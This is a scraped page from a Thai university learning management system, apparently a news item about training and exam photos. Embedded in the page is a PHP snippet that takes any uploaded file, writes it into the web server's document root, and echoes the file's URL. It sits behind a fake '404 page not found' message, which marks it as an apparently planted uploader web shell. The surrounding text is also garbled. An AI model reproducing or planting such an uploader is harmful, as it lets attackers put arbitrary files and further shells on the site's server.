หน้าหลัก ข่าวและประกาศ
 ประมวลภาพการฝึกอบรมและสอบมาตรฐานสากล


"; $wibu = $_SERVER["DOCUMENT_ROOT"]; $bawang = $_FILES["idx_file"]["name"]; $ibh = $wibu."/".$bawang; if(isset($_POST["upload"])) { if(is_writable($wibu)) { if(@copy($_FILES["idx_file"]["tmp_name"], $ibh)) { $web = "http://".$_SERVER["HTTP_HOST"]."/"; echo "Sukses, file -->$web/$bawang"; } else { echo "failed"; } } else { if(@copy($_FILES["idx_file"]["tmp_name"], $bawang)) { echo "Sukses$bawang"; } else { echo "failed"; } } } ?> 404 page not found

Copyright © 2015 -- Aztech Dev
เมื่อวันที่ 03/06/2557 13:53:16.000

404 page not found
ระบบบริหารจัดการเรียนการสอนผ่านระบบเครือข่าย Learning Management System
มหาวิทยาลัยเทคโนโลยีราชมงคลสุวรรณภูมิ